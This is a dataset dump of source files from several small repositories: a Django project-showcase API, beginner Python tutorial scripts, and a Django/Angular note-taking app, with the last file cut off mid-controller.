"license_type": "no_license", "max_line_length": 26, "num_lines": 11, "path": "/requirements.txt", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "Django==2.2\ndjango-tinymce==2.8.0\ndjangorestframework==3.9.2\nPillow==6.0.0\npsycopg2==2.8.2\npsycopg2-binary==2.8.2\npython-slugify==3.0.2\npytils==0.3\npytz==2019.1\nsqlparse==0.3.0\ntext-unidecode==1.2\n" }, { "alpha_fraction": 0.5726276636123657, "alphanum_fraction": 0.5840522050857544, "avg_line_length": 27.41059684753418, "blob_id": "7b5ff341904136b01fa48cb30e11be38d628b95b", "content_id": "91dd85d6fbd2bb3801bd09de65fa5b4bdebeaf8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4289, "license_type": "no_license", "max_line_length": 79, "num_lines": 151, "path": "/projectApp/models.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.validators import (\n MinValueValidator,\n MaxValueValidator,\n FileExtensionValidator\n)\nfrom django.utils.text import slugify\n\nfrom tinymce.models import HTMLField\nfrom projectApp.validators import FileSizeValidator\n\n\nclass Project(models.Model):\n \"\"\"Represents project, published on the web-site.\"\"\"\n\n title = models.CharField(\n _('title'),\n max_length=255,\n unique=True,\n help_text=_(\"At most 255 characters.\")\n )\n slug = models.SlugField(\n _('slug'),\n max_length=128,\n blank=True,\n null=True,\n unique=True,\n help_text=_(\"At most 128 characters, allowed characters:'-_a-z0-9'.\")\n )\n preview = models.ImageField(\n _('preview'),\n upload_to='projectApp/previews/',\n validators=[\n FileExtensionValidator(allowed_extensions=['jpg', 'jpeg']),\n FileSizeValidator(2.5 * 1024 * 1024)\n ],\n blank=True,\n null=True\n )\n short_description = models.TextField(_('short description'))\n full_description = HTMLField(_('full description'))\n number_of_people = models.PositiveSmallIntegerField(\n _('number of people'),\n default=1,\n validators=[MinValueValidator(1), MaxValueValidator(1000)],\n help_text=_(\"Positive integer in range 1 to 1000 inclusive.\")\n )\n date_of_created = models.DateTimeField(\n _('date of creation'),\n auto_now_add = True,\n auto_now = False\n )\n date_of_updated = models.DateTimeField(\n _('date of update'),\n auto_now_add = False,\n auto_now = True\n )\n date_of_end = models.DateTimeField(_('date of end'), null=True, blank=True)\n is_active = models.BooleanField(_('is active'), default=True)\n\n status = models.ForeignKey(\n 'Status',\n null=True,\n on_delete=models.SET_NULL,\n verbose_name=_('status')\n )\n tags = models.ManyToManyField(\n 'Tag',\n related_name='projects',\n verbose_name=_('tags')\n )\n\n class Meta:\n verbose_name = _(\"enrolled project\")\n verbose_name_plural = _(\"enrolled projects\")\n\n def save(self, *args, **kwargs):\n # Update slug field, if it's empty - write slugified title there:\n self.slug = self.slug.lower() if self.slug else slugify(self.title)\n\n # Check preview, if it has updated, remove old image:\n try:\n old_self = Project.objects.get(id=self.id)\n if (not self.preview) or self.preview != old_self.preview:\n old_self.preview.delete(save=False)\n except:\n # If it's a new project or a first preview, just don't do nothing:\n pass\n\n super().save(*args, **kwargs)\n\n def __str__(self):\n return \"'%s' project.\" % self.title\n\nclass Tag(models.Model):\n \"\"\"\n Represents tag which marks programming language or technology,\n used in some project. Project can have many tags, so it has\n one to many relation with Project model.\n \"\"\"\n\n title = models.CharField(\n _('title'),\n max_length=50,\n unique=True,\n help_text=_(\"At most 50 characters.\")\n )\n slug = models.SlugField(\n _('slug'),\n max_length=50,\n unique=True,\n null=True,\n help_text=_(\"At most 50 characters, allowed characters:'-_a-z0-9'.\")\n )\n\n class Meta:\n verbose_name = _(\"project's tag\")\n verbose_name_plural = _(\"project's tags\")\n\n def save(self, *args, **kwargs):\n \"\"\"\n Before storing data in database,\n converts slug string to lower case.\n \"\"\"\n\n self.slug = self.slug.lower()\n super().save(*args, **kwargs)\n\n def __str__(self):\n return self.title\n\nclass Status(models.Model):\n \"\"\"\n Represents status of some project.\n (for ex. 'active', 'complete')\n \"\"\"\n\n title = models.CharField(\n _('title'),\n max_length=16,\n unique=True,\n help_text=_(\"At most 16 characters.\")\n )\n\n class Meta:\n verbose_name = _(\"project's status\")\n verbose_name_plural = _(\"project's statuses\")\n\n def __str__(self):\n return \"Status: '%s'.\" % self.title" }, { "alpha_fraction": 0.5611233711242676, "alphanum_fraction": 0.5655286312103271, "avg_line_length": 29.779661178588867, "blob_id": "9c7f7088c39dc644f979afe8ea76f09da56b0488", "content_id": "a11a72eb558996bd75cd04804dd57ad80ba3e5a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1816, "license_type": "no_license", "max_line_length": 75, "num_lines": 59, "path": "/projectApp/validators.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.deconstruct import deconstructible\n\n@deconstructible\nclass FileSizeValidator:\n \"\"\"\n Takes maximum size, allowed for a file, in bytes.\n Creates validator for a FileField.\n \"\"\"\n message = _(\n \"Ensure that file size are less than %(max_size)s %(prefix)sBytes.\"\n )\n code = 'limit_file_size'\n\n _decimal_prefixes = ('k', 'M', 'G')\n\n\n def __init__(self, max_size, message=None, code=None):\n self.max_size = max_size\n if message is not None:\n self.message = message\n if code is not None:\n self.code = code\n\n def __call__(self, value):\n if value.size > self.max_size:\n raise ValidationError(\n self.message,\n code=self.code,\n params=self._get_pretty_size_params()\n )\n\n def __eq__(self, other):\n return (\n isinstance(other, self.__class__) and\n self.max_size == other.max_size and\n self.message == other.message and\n self.code == other.code\n )\n\n def _get_pretty_size_params(self):\n \"\"\"\n Returns a dictionary with message parameters\n (max_size, prefix) as keys, and values, depends on\n maximum allowed bytes for a file.\n \"\"\"\n max_size = self.max_size\n prefix = ''\n\n options_quantity = len(FileSizeValidator._decimal_prefixes)\n for i in range(options_quantity, 0, -1):\n base = 1024 ** i\n if self.max_size >= base:\n max_size /= base\n prefix = FileSizeValidator._decimal_prefixes[i - 1]\n break\n\n return {'max_size':round(max_size, 2), 'prefix':prefix}\n" }, { "alpha_fraction": 0.7105882167816162, "alphanum_fraction": 0.7105882167816162, "avg_line_length": 25.5625, "blob_id": "55555cf7f1207d67a173bdfb0dd395cf631383eb", "content_id": "c970f7832bacffea56d49d2b5c97525072d433cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 425, "license_type": "no_license", "max_line_length": 50, "num_lines": 16, "path": "/projectApp/admin.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom projectApp.models import Project, Tag, Status\n\n@admin.register(Project)\nclass ProjectAdmin(admin.ModelAdmin):\n pass\n\n@admin.register(Tag)\nclass TagAdmin(admin.ModelAdmin):\n list_display = ('id', 'title', 'slug')\n list_display_links = ('title',)\n\n@admin.register(Status)\nclass StatusAdmin(admin.ModelAdmin):\n list_display = ('id', 'title')\n list_display_links = ('title',)\n" } ]
10
ivan-yosifov/python-2019
https://github.com/ivan-yosifov/python-2019
b3da0fa31ec952b1cfde5d976189ae458ed07229
d5d73351e957281de05a796ae7087a82521cac54
ca95dc5cf00fb19c2cb1c7a53ff77c42fcd7c102
refs/heads/master
2020-12-05T11:28:37.794414
2020-01-06T13:10:41
2020-01-06T13:10:41
232,095,080
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.713178277015686, "alphanum_fraction": 0.713178277015686, "avg_line_length": 9.833333015441895, "blob_id": "010f85461117a8759eeaf5efa6f032586fbb1992", "content_id": "55b33dd66d7015e8c30374f15c91799500231588", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 20, "num_lines": 12, "path": "/1hello.py", "repo_name": "ivan-yosifov/python-2019", "src_encoding": "UTF-8", "text": "'''\nMulti-line comment\nenjoy\nhahahha\n'''\nimport os\n\n# clear terminal\nos.system('clear')\n\n# print Hello World\nprint('Hello World')" }, { "alpha_fraction": 0.6477272510528564, "alphanum_fraction": 0.6704545617103577, "avg_line_length": 10.125, "blob_id": "01a1c89f0654da5816ce13b81f4c570a2b7b0fdb", "content_id": "2d307ab9378e2b7597b9af5a842fbfcdca8b2491", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 20, "num_lines": 8, "path": "/2variables.py", "repo_name": "ivan-yosifov/python-2019", "src_encoding": "UTF-8", "text": "import os\nos.system('clear')\n\nfull_name = 'Megan Fox'\nage = 30\n\nprint(full_name)\nprint(age)" }, { "alpha_fraction": 0.5140351057052612, "alphanum_fraction": 0.5280701518058777, "avg_line_length": 14.86111068725586, "blob_id": "c80480c74b1dd1163504d83982a814f4de0e8ac6", "content_id": "23cd4056032a324c693be4448d79f6f37ba9b44b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 570, "license_type": "no_license", "max_line_length": 43, "num_lines": 36, "path": "/3types.py", "repo_name": "ivan-yosifov/python-2019", "src_encoding": "UTF-8", "text": "########################\n# Learn Python 2019\n########################\n\nimport os\nos.system('clear')\n\n##############################\n# DATA TYPES\n# Strings\n# Numbers\n# Lists\n# Tuples - list that can't be changed\n# Dictionaries\n# Boolean\n##############################\n\nfirst_name = 'Megan'\nage = 41\n\nfriends = ['Jennifer','Britney','Jessica']\nprint(friends[0])\n\nfoods = ('pizza', 'ice cream', 'chocolate')\nprint(foods[0])\n\nfav_pizza = {\n 'John': 'Bacon',\n 'Megan': 'Mushroom',\n 'Mary': 'Cheese'\n}\nprint(fav_pizza['Megan'])\n\nmarried = True\npretty = False\nprint(married)" }, { "alpha_fraction": 0.6003975868225098, "alphanum_fraction": 0.6143141388893127, "avg_line_length": 19.1200008392334, "blob_id": "53564278a4ac85ba599801dfc230de06924b3865", "content_id": "8215697836716c08b32cc2497bae67118a5b7bfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 503, "license_type": "no_license", "max_line_length": 50, "num_lines": 25, "path": "/4strings.py", "repo_name": "ivan-yosifov/python-2019", "src_encoding": "UTF-8", "text": "########################\n# Learn Python 2019\n########################\n\nimport os\nos.system('clear')\n\ngreetings = \"My boss yelled \\\"Get back to work!\\\"\"\nprint(greetings)\n\nfirst_name = 'Megan'\nlast_name = 'Fox'\nprint(first_name + ' ' + last_name)\n\nprint(first_name.upper())\nprint(first_name.lower())\nprint(first_name.capitalize())\nprint(first_name.title())\nprint(first_name.swapcase())\n\nprint(len(first_name))\n\nprint(first_name[0])\nprint(first_name[0:3]) # Meg\nprint(first_name.split('g')) # ['Me', 'an']\n" }, { "alpha_fraction": 0.41474655270576477, "alphanum_fraction": 0.48847925662994385, "avg_line_length": 11.11111068725586, "blob_id": "a08043fde42ee1965e706ce8fdb77b0e561a2ebb", "content_id": "75354f622801a3af6f41d8c030974d65ea86d961", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 24, "num_lines": 18, "path": "/5numbers.py", "repo_name": "ivan-yosifov/python-2019", "src_encoding": "UTF-8", "text": "########################\n# Learn Python 2019\n########################\n\nimport os\nos.system('clear')\n\nnum = 10\nprint(float(num))\n\nprice = 10.25\nprint(int(price))\n\nprint(7 + 2)\nprint(5**2)\n\nnum = \"5\"\nprint(int(num) + 9)" } ]
5
dmegyesi/nest-prometheus
https://github.com/dmegyesi/nest-prometheus
a160cc47bea7898b485d2e37e1f3d97c96dcc8e8
8a0ad67d490b8a20ec843857e3769bc026c07aea
ab6a9250b2672772541519255def2c1877051766
refs/heads/master
2021-07-14T14:43:10.206673
2018-12-25T23:51:52
2018-12-25T23:51:52
145,924,582
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.659069299697876, "alphanum_fraction": 0.6650047302246094, "avg_line_length": 46.325843811035156, "blob_id": "3eecca3b2cff0beccbe2736046dd748fa760df41", "content_id": "18493b8604820d7fc654ded7bbe5ad945d3c5b71", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4216, "license_type": "permissive", "max_line_length": 215, "num_lines": 89, "path": "/metrics.py", "repo_name": "dmegyesi/nest-prometheus", "src_encoding": "UTF-8", "text": "from prometheus_client import start_http_server, Summary, Gauge\nimport pyowm\nimport configparser\nimport os\nimport time\nimport sys\nimport nest\n\n\n# Gauges\ng = {\n 'is_online': Gauge('is_online', 'Device connection status with the Nest service', ['structure', 'device']),\n 'has_leaf': Gauge('has_leaf', 'Displayed when the thermostat is set to an energy-saving temperature', ['structure', 'device']),\n 'target_temp': Gauge('target_temp', 'Desired temperature, in half degrees Celsius (0.5°C)', ['structure', 'device']),\n 'current_temp': Gauge('current_temp', 'Temperature, measured at the device, in half degrees Celsius (0.5°C)', ['structure', 'device']),\n 'humidity': Gauge('humidity', 'Humidity, in percent (%) format, measured at the device, rounded to the nearest 5%', ['structure', 'device']),\n 'state': Gauge('state', 'Indicates whether HVAC system is actively heating, cooling or is off. Use this value to indicate HVAC activity state', ['structure', 'device']),\n 'mode': Gauge('mode', 'Indicates HVAC system heating/cooling modes, like Heat•Cool for systems with heating and cooling capacity, or Eco Temperatures for energy savings', ['structure', 'device']),\n 'time_to_target': Gauge('time_to_target', 'The time, in minutes, that it will take for the structure to reach the target temperature', ['structure', 'device']),\n \n 'weather_current_temp': Gauge('weather_current_temp', 'Current temperature, in Celsius', ['city']),\n 'weather_current_humidity': Gauge('weather_current_humidity', 'Current humidity, in percent (%)', ['city']),\n}\n\n# Create a metric to track time spent and requests made.\nREQUEST_TIME = Summary('request_processing_seconds', 'Time spent processing request')\n# Decorate function with metric.\n@REQUEST_TIME.time()\ndef polling(napi, o):\n print(\"%s - Polling!\" % time.time())\n\n loc = o.get_location()\n city = loc.get_name()\n w = observation.get_weather()\n\n #w.get_temperature('celsius')['temp']\n for structure in napi.structures:\n for device in structure.thermostats:\n g['is_online'].labels(structure.name, device.name).set(device.online)\n g['has_leaf'].labels(structure.name, device.name).set(device.has_leaf)\n g['target_temp'].labels(structure.name, device.name).set(device.target)\n g['current_temp'].labels(structure.name, device.name).set(device.temperature)\n g['humidity'].labels(structure.name, device.name).set(device.humidity)\n g['state'].labels(structure.name, device.name).set((0 if device.hvac_state == \"off\" else 1))\n g['mode'].labels(structure.name, device.name).set((0 if device.mode == \"off\" else 1))\n g['time_to_target'].labels(structure.name, device.name).set(''.join(x for x in device.time_to_target if x.isdigit()))\n\n g['weather_current_temp'].labels(city).set(w.get_temperature('celsius')['temp'])\n g['weather_current_humidity'].labels(city).set(w.get_humidity())\n\n\nif __name__ == '__main__':\n c = configparser.ConfigParser()\n c.read(os.path.join(os.path.abspath(os.path.dirname(__file__)),'settings.ini'))\n\n # Setup Nest account\n start_time = time.time()\n\n napi = nest.Nest(client_id=c['nest']['client_id'], client_secret=c['nest']['client_secret'], access_token_cache_file=os.path.join(os.path.abspath(os.path.dirname(__file__)),c['nest']['access_token_cache_file']))\n \n resp_time = time.time() - start_time\n sys.stderr.write(\"Nest API: %0.3fs\\n\" % resp_time)\n\n if napi.authorization_required:\n print(\"Go to \" + napi.authorize_url + \" to authorize, then enter PIN below\")\n if sys.version_info[0] < 3:\n pin = raw_input(\"PIN: \")\n else:\n pin = input(\"PIN: \")\n napi.request_token(pin)\n\n\n # Setup OpenWeatherMap account\n start_time = time.time()\n\n owm = pyowm.OWM(c['owm']['owm_id'])\n observation = owm.weather_at_id(int(c['owm']['owm_city_id']))\n\n resp_time = time.time() - start_time\n sys.stderr.write(\"OpenWeatherMap API: %0.3fs\\n\" % resp_time)\n \n\n # Start up the server to expose the metrics.\n start_http_server(8000)\n sys.stdout.write(\"Listening on port 8000...\\n\")\n \n while True:\n polling(napi, observation)\n time.sleep(60)\n" }, { "alpha_fraction": 0.7240506410598755, "alphanum_fraction": 0.746835470199585, "avg_line_length": 27.214284896850586, "blob_id": "d6aff331b85185e7282d509fcbb758d366d71e09", "content_id": "aea18e6bd4a7db5bbcfc36026f0fb4501807ff04", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 395, "license_type": "permissive", "max_line_length": 89, "num_lines": 14, "path": "/README.md", "repo_name": "dmegyesi/nest-prometheus", "src_encoding": "UTF-8", "text": "# Prometheus client for Nest API\n\nThis is a client application which fetches\n- the current state of my Nest thermostat\n- the current weather conditions, based on the OpenWeatherMap API\n\nSee `example/` folder for example outputs.\n\n## Dev environment\n`docker run --rm -ti -v $(pwd):/app -w /app --entrypoint sh -p 8080:8000 python:3-alpine`\n\n- pip install -r requirements.txt\n\n- python metrics.py\n" } ]
2
daejoon/learning-python
https://github.com/daejoon/learning-python
3a1fd1f1445393e31dd53a7484fd9d56e0b2250a
d3446307f626721eaaf0bd63112dd728dc187212
21a152319c839b3b61a102e2cf4b539f9e5e2870
refs/heads/master
2021-10-11T09:35:51.082784
2019-01-24T08:27:15
2019-01-24T08:27:15
34,562,318
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5784174799919128, "alphanum_fraction": 0.5793613195419312, "avg_line_length": 32.109375, "blob_id": "60790b4ca641540548445e2b1917065fd7647783", "content_id": "b41136e6d0a4cc84b5b6010091a4963b5137b120", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6509, "license_type": "no_license", "max_line_length": 146, "num_lines": 192, "path": "/DjangoApp/quicksilver/views.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport re\n\nfrom django.views.generic.base import TemplateView, View\n\nfrom django.forms.models import model_to_dict\nfrom django.db.models import Q\n\nfrom django.utils import timezone\nimport logging\n\nfrom quicksilver.decorations.set_variable import setTplViewVariable\nfrom quicksilver.utils.ajax_util import AjaxResponse, AjaxRequest\nfrom quicksilver.models import NoteBook, Note\n\n\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\nclass HomeView(TemplateView):\n template_name = 'quicksilver/home.html'\n\n @setTplViewVariable(\"appName\", \"quicksilver\")\n @setTplViewVariable(\"title\", \"QuickSilver\")\n def get_context_data(self, **kwargs):\n logger.debug(\"home - get_context_data\")\n context = super(HomeView, self).get_context_data(**kwargs)\n return context\n\n# angular template 호출 페이지\nclass AngularTplView(TemplateView):\n def get_context_data(self, **kwargs):\n self.template_name = \"quicksilver/tpl/\" + kwargs['page_name'] + \".html\"\n return super(AngularTplView, self).get_context_data(**kwargs)\n\nclass NotebookListView(View):\n\n def post(self, request, *args, **kwargs):\n pass\n\n def get(self, request, *args, **kwargs):\n qs = NoteBook.objects.filter(isDelete=False).order_by('-regDate')\n\n listData = [model_to_dict(item) for item in list(qs)]\n for notebook in listData:\n notebook['type'] = 'notebook'\n notebook['noteCnt'] = Note.objects.filter(notebook__pk=notebook['id'], isDelete=False).count()\n\n # Trash 추가한다.\n listData.append({\n 'type': 'trash',\n 'id': 0,\n 'title': 'Trash',\n 'isModify': False,\n 'noteCnt': Note.objects.filter(isDelete=True).order_by('-regDate').count()\n })\n\n return AjaxResponse(listData)\n\n # notebook을 삭제하면 실제 삭제하지 않는다. isDelete flag만 False 로 변경한다.\n # 실제 삭제는 Trash에서 이루어 진다.\n def delete(self, request, *args, **kwargs):\n try:\n model = NoteBook.objects.get(pk=kwargs['notebook_id'])\n model.isDelete = True\n model.deleteDate = timezone.now()\n model.save()\n Note.objects.filter(notebook__pk=kwargs['notebook_id']).update(isDelete=True, deleteDate=timezone.now())\n except:\n pass\n\n return AjaxResponse()\n\n def put(self, request, *args, **kwargs):\n ajaxRequest = AjaxRequest(request)\n data = ajaxRequest.getData()\n\n try:\n # 신규\n if int(data['id']) == 0:\n model = NoteBook()\n else:\n model = NoteBook.objects.get(pk=data['id'])\n except:\n model = NoteBook()\n\n model.modifyDate = timezone.now()\n for field in NoteBook._meta.get_fields():\n if field.name in data:\n if not (bool(re.search('date', field.name, flags=re.IGNORECASE)) or bool(re.search('id', field.name, flags=re.IGNORECASE))):\n model.__dict__[field.name] = data[field.name]\n\n model.save()\n notes = Note.objects.filter(notebook__pk=model.pk, isDelete=False)\n\n cvt_model = model_to_dict(model)\n cvt_model['type'] = 'notebook'\n cvt_model['noteCnt'] = notes.count()\n return AjaxResponse(cvt_model)\n\n\nclass TrashView(View):\n def get(self, request, *args, **kwargs):\n qs = Note.objects.filter(isDelete=True)\n return AjaxResponse(qs)\n\n def delete(self, request, *args, **kwargs):\n # 실제 테이블에서 삭제가 이루어진다.\n try:\n if 'note_id' in kwargs and kwargs['note_id'] != None:\n Note.objects.filter(pk=kwargs['note_id']).delete()\n else:\n Note.objects.filter(isDelete=True).delete()\n NoteBook.objects.filter(isDelete=True).delete()\n except:\n pass\n\n return AjaxResponse()\n\n\nclass RecentNoteView(View):\n def get(self, request, *args, **kwargs):\n qs = Note.objects.filter(isDelete=False).order_by('-modifyDate', '-regDate')[:5]\n return AjaxResponse(qs)\n\n\nclass NoteListView(View):\n def get(self, request, *args, **kwargs):\n notebookType = None\n\n #notebook\n if 'notebook_id' in kwargs and int(kwargs['notebook_id']) > 0:\n qs = Note.objects.filter(notebook__pk=kwargs['notebook_id'], isDelete=False).order_by('-regDate')\n notebookType = \"notebook\"\n #search\n elif 'search_text' in kwargs:\n qs = Note.objects\\\n .filter(isDelete=False)\\\n .filter(Q(title__icontains=kwargs['search_text']) | Q(content__icontains=kwargs['search_text']))\\\n .order_by('-regDate')\n notebookType = \"search\"\n #trash\n else:#Trash List\n qs = Note.objects.filter(isDelete=True).order_by('-deleteDate', '-regDate')\n notebookType = \"trash\"\n\n return AjaxResponse(qs, paramDic={'notebookType':notebookType})\n\n\nclass NoteView(View):\n def get(self, request, *args, **kwargs):\n qs = Note.objects.get(pk=kwargs['note_id'])\n return AjaxResponse(qs)\n\n # 실제로 삭제하지 않는다. isDelete flag만 변경해준다.\n def delete(self, request, *args, **kwargs):\n try:\n note = Note.objects.get(pk=kwargs['note_id'])\n note.isDelete = True\n note.save()\n except:\n pass\n\n return AjaxResponse()\n\n def put(self, request, *args, **kwargs):\n ajaxRequest = AjaxRequest(request)\n data = ajaxRequest.getData()\n\n if bool(data):\n try:\n # 신규\n if int(data['id']) == 0:\n model = Note()\n else:\n model = Note.objects.get(pk=data['id'])\n except:\n model = Note()\n\n model.modifyDate = timezone.now()\n for field in Note._meta.get_fields():\n if field.name in data:\n if not (bool(re.search('date', field.name, flags=re.IGNORECASE)) or bool(re.search('^id$', field.name, flags=re.IGNORECASE))):\n model.__dict__[field.name] = data[field.name]\n\n notebook = NoteBook.objects.get(pk=data['notebook'])\n model.notebook = notebook\n model.save()\n return AjaxResponse(model)\n else:\n return AjaxResponse()\n" }, { "alpha_fraction": 0.7273755669593811, "alphanum_fraction": 0.7341628670692444, "avg_line_length": 34.400001525878906, "blob_id": "519c09c2466018025b9831defc1b57584faff377", "content_id": "36cabbdc7fbdeaa719884a3ad15f9fd76b905573", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 884, "license_type": "no_license", "max_line_length": 70, "num_lines": 25, "path": "/DjangoApp/quicksilver/models.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\nclass NoteBook(models.Model):\n title = models.CharField(max_length=255)\n isDelete = models.BooleanField(default=False)\n regDate = models.DateTimeField(default=timezone.now)\n modifyDate = models.DateTimeField(default=timezone.now, null=True)\n deleteDate = models.DateTimeField(null=True)\n\n def __unicode__(self):\n return self.title\n\nclass Note(models.Model):\n title = models.CharField(max_length=255)\n content = models.TextField(null=True)\n isDelete = models.BooleanField(default=False)\n regDate = models.DateTimeField(default=timezone.now)\n modifyDate = models.DateTimeField(default=timezone.now, null=True)\n deleteDate = models.DateTimeField(null=True)\n notebook = models.ForeignKey(NoteBook)\n\n def __unicode__(self):\n return self.title" }, { "alpha_fraction": 0.7424892783164978, "alphanum_fraction": 0.7424892783164978, "avg_line_length": 22.399999618530273, "blob_id": "63aa9a94d36410fa9f199b51b110d7ab1b030547", "content_id": "07e6ea319feed2b3eb0d893a50e66b2ceba53a8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 233, "license_type": "no_license", "max_line_length": 46, "num_lines": 10, "path": "/DjangoApp/quicksilver/templatetags/settings_tags.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "__author__ = 'kdj'\n\nfrom django import template\nfrom django.conf import settings\n\nregister = template.Library()\n\n@register.assignment_tag(takes_context=True)\ndef get_my_setting(context):\n return getattr(settings, 'MY_SETTING', '')" }, { "alpha_fraction": 0.5743243098258972, "alphanum_fraction": 0.5743243098258972, "avg_line_length": 30.510639190673828, "blob_id": "989f6a8436e1a199f328c4182ca948f34818f45f", "content_id": "dd95b301aa6abc0c9b593d75efb08a3a07c458e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1480, "license_type": "no_license", "max_line_length": 93, "num_lines": 47, "path": "/DjangoApp/quicksilver/utils/ajax_util.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "__author__ = 'kdj'\nimport json\n\nfrom django.http import JsonResponse\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models.query import QuerySet\nfrom django.db import models\nfrom django.forms.models import model_to_dict\n\n\nclass AjaxResponse(JsonResponse):\n def __init__(self, data={}, paramDic={}, encoder=DjangoJSONEncoder, safe=True, **kwargs):\n newData = dict()\n try:\n if isinstance(data, QuerySet):\n newData['data'] = [model_to_dict(item) for item in list(data)]\n elif isinstance(data, models.Model):\n newData['data'] = model_to_dict(data)\n else:\n newData['data'] = data\n\n if 'message' in kwargs:\n newData['message'] = kwargs['message']\n else:\n newData['message'] = ''\n except Exception as e:\n newData['status'] = False\n newData['message'] = str(e)\n else:\n newData['status'] = True\n finally:\n newData = dict(newData.items() + paramDic.items())\n super(AjaxResponse, self).__init__(newData, encoder, safe, **kwargs)\n\nclass AjaxRequest(object):\n def __init__(self, request):\n self.request = request\n\n def getData(self):\n data = json.loads(self.request.body)\n if 'data' in data:\n return data['data']\n else:\n return data\n\n def getRequest(self):\n return self.request" }, { "alpha_fraction": 0.37472331523895264, "alphanum_fraction": 0.37638336420059204, "avg_line_length": 39.69819641113281, "blob_id": "ce39b3ec9acb101e934b819b0854e75b7212fd7b", "content_id": "f6409a035f9f715174e90fbec0c04c316ba89016", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 9252, "license_type": "no_license", "max_line_length": 105, "num_lines": 222, "path": "/DjangoApp/static/js/quicksilver/controllers/noteListCtrl.js", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": ";\n(function (angular, $, _, console) {\n var modduleName = \"quicksilver.controller\";\n var controllerName = \"noteListCtrl\";\n\n angular\n .module(modduleName)\n .controller(controllerName, [\n '$scope', '$rootScope', '$timeout', '$q', 'noteListSvc', 'noteSvc', 'quicksilverModelSvc',\n function($scope, $rootScope, $timeout, $q, noteListSvc, noteSvc, quicksilverModelSvc) {\n 'use strict';\n\n $scope.noteList = [];\n $scope.noteListIndex = -1;\n $scope.currentNotebook = quicksilverModelSvc.createNoteBook();\n $scope.notebookType = \"\";\n\n /**\n * 메뉴가 보일때\n * @param $index\n */\n $scope.showContextMenu = function ($index) {\n $scope.noteListIndex = $index;\n\n // 마지막 요소인지 검사한다.\n if ( $scope.notebookType.toLowerCase() === \"trash\") {\n $(\"#note-contextmenu\")\n .find(\"li\")\n .hide()\n .end()\n .find(\"li\")\n .last()\n .show();\n } else if ($scope.notebookType.toLowerCase() === \"notebook\") {\n $(\"#note-contextmenu\")\n .find(\"li\")\n .show();\n } else if ( $scope.notebookType.toLowerCase() === \"search\" ) {\n $(\"#note-contextmenu\")\n .find(\"li\")\n .hide()\n .end()\n .find(\"li\")\n .last()\n .show();\n }\n };\n\n /**\n * 새로운 노트를 추가한다.\n * @param $event\n */\n $scope.addNote = function (newNote) {\n if ( $scope.currentNotebook.id > 0 ) {\n newNote = newNote || quicksilverModelSvc.createNote();\n newNote.notebook = $scope.currentNotebook.id;\n newNote.id = 0;\n noteSvc\n .addNote(newNote)\n .success(function (data, status, headers, config) {\n $scope.noteList.unshift(quicksilverModelSvc.copyNote(data.data));\n $scope.selectNote(0);\n $scope.currentNotebook.noteCnt++;\n\n $rootScope.$broadcast('recentNoteListCtrl:changeNoteList');\n });\n }\n };\n\n /**\n * 리스트에서 노트를 선택한다.\n * @param $index\n */\n $scope.selectNote = function($index) {\n $scope.noteListIndex = $index;\n $rootScope.$broadcast(\"noteCtrl:selectNote\", $scope.noteList[$index]);\n _.each($scope.noteList, function (val, idx) {\n val.isFocus = (idx === $index)?true:false;\n });\n };\n\n /**\n * 노트를 복사할때 이벤트\n */\n $scope.$on(\"noteListCtrl:duplicateNote\", function (e) {\n var copyItem = $scope.noteList[$scope.noteListIndex];\n $scope.addNote(copyItem);\n });\n\n /**\n * 노트를 삭제할때 이벤트\n */\n $scope.$on(\"noteListCtrl:deleteNote\", function (e) {\n var deleteNote = $scope.noteList[$scope.noteListIndex];\n var fnName = \"deleteNote\";\n\n switch ($scope.notebookType.toLowerCase()) {\n case \"notebook\":\n case \"search\":\n fnName = \"deleteNote\";\n break;\n case \"trash\":\n fnName = \"trashDeleteNote\";\n break;\n }\n\n noteSvc[fnName](deleteNote)\n .success(function (data, status, headers, config) {\n $rootScope.$broadcast('recentNoteListCtrl:changeNoteList');\n $rootScope.$broadcast('notebookListCtrl:changeNoteCnt', {\n notebook_id: deleteNote.notebook,\n notebookType: $scope.notebookType\n });\n $scope.noteList.splice($scope.noteListIndex,1);\n 